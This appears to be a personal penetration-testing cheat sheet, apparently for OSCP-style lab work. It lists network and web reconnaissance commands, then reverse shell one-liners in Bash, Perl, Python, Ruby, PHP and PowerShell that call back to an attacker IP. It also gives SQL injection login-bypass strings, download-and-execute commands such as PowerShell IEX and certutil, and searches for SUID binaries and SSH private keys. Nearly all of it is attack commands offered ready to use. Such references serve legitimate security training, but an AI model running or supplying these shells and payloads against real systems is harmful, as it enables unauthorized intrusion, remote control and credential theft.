Recon

Network Scanning
NetDiscover (ARP Scanning):
	• fping -g 10.0.0.1/24
	• netdiscover -r 10.0.0.1/24
	• nmap -sn 10.0.0.1-254
	• masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 10.0.0.1/24

Host Scanning
fast
	• nmap -sV -sC -O -T4 -n -Pn -oA 10.0.0.1
full
	• nmap -sV -sC -O -T4 -n -Pn -p- -oA 10.0.0.1

automated
sudo autorecon 10.0.0.1
sudo nmapAutomator.sh 10.0.0.1


DNSRecon
	• dnsrecon -d www.example.com -a
	• dnsrecon -d www.example.com -t axfr

Sublis3r: 
	• Sublist3r -d www.example.com
	• Sublist3r -v -d www.example.com -p 80,443

WEB
	• nikto --url 10.0.0.1
	• wpscan --url 10.0.0.1
wpscan --url --enumerate ap at 10.0.0.1

https://github.com/21y4d/nmapAutomator
https://github.com/Tib3rius/AutoRecon
https://github.com/maurosoria/dirsearch

sudo nmapAutomator.sh -H 10.0.0.1 -t all 
sudo autorecon 10.0.0.1
dirsearch  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.0.0.1 -e php,txt --full-url -t 50


Ports
https://blog.thehackingnomad.com/cheat-sheet-series/netwerkenum
https://sushant747.gitbooks.io/total-oscp-guide/content/list_of_common_ports.html







Shells
Bash
	• bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
Perl
	• perl -e 'use Socket;$i="10.0.0.1";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
	• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
	• import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.24\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);
• Ruby
	• ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
	• ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[10.0.0.1]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
PHP
	• http://pentestmonkey.net/tools/web-shells/php-reverse-shell
	• php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Powershell
	• $callback = New-Object System.Net.Sockets.TCPClient("10.0.0.1",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close()


Others
	• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
	• https://book.hacktricks.xyz/shells/shells



Better shell
	• python -c 'import pty; pty.spawn("/bin/bash")'
	• python3 -c 'import pty; pty.spawn("/bin/bash")'
	• perl -e 'exec "/bin/bash";'






SQLi
	• ' or 1=1;-- 
	• ' or '1'='1 
	• ' or 1=1;# 
	• ') or ('x'='x 
	• ' or <column> like '%';-- 
	• ' or 1=1 LIMIT 1;-- 
	• admin' --
	• admin' #
	• admin'/*
	• ' or 1=1--
	• ' or 1=1#
	• ' or 1=1/*
	• ') or '1'='1--
	• ') or ('1'='1—
	• ' or 1/* 
	• */ =1 -- 
	• admin' or 'a'='a 
  
  
  
  
  
  File transfer
  
  Linux
	• sudo python -m SimpleHTTPServer 80
	• wget http://10.0.0.1/<file>
	• curl 10.0.0.1 -o <OUT_FILE>
	• Updog
	
Windows
	• powershell.exe (New-Object System.Net.WebClient).DownloadFile('10.0.0.1', '<DESTINATION_FILE>')
	• powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('10.0.0.1')
	• powershell "wget 10.0.0.1"
	• certutil.exe -urlcache  -split -f http://ip:port/file
	

SMB
kali
	• sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py <Sharename> <where to run the share>

Windows
	• copy \\10.0.0.1\<shearename>\<file> c:\windows\temp\filename

	• Page 480 DOC 
	
	• https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

  
  
  
  
  
  
  
  
Priviledge Escalation
find / -user root -type f -perm -4000  -ls 2>/dev/null

Finding SSH keys
	• find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

https://github.com/carlospolop/PEASS-ng
https://github.com/rebootuser/LinEnum
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/mzet-/linux-exploit-suggester







usefull links
	• https://github.com/swisskyrepo/PayloadsAllTheThings
	• https://book.hacktricks.xyz/
	• https://guide.offsecnewbie.com/network-pen#scan-for-hosts
	• https://sushant747.gitbooks.io/total-oscp-guide/content/list_of_common_ports.html
	• https://guif.re/
	• https://github.com/Tib3rius/Pentest-Cheatsheets

